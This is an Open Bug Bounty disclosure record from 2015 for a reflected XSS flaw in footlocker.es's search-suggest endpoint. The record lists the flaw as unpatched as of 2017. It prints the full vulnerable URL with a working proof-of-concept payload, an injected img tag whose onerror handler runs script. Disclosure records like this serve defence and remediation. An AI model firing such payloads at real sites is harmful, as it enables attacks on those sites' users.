footlocker.es XSS vulnerability

2015-09-25T17:33:00
ID OBB:88811
Type openbugbounty
Reporter P4r4Bellum
Modified 2015-09-25T17:35:00

Description

Vulnerable URL:
https://www.footlocker.es/INTERSHOP/web/WFS/Footlocker-Footlocker_ES-Site/es_ES/-/EUR/ViewSuggestSearch-Suggest?MaxAutoSuggestResults=10&SearchTerm;=%22%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 240841
Google Pagerank| 0
VIP website status:| No
Check footlocker.es SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 25 September, 2015 17:33 GMT
Vulnerability existence verified and confirmed| 25 September, 2015 17:35 GMT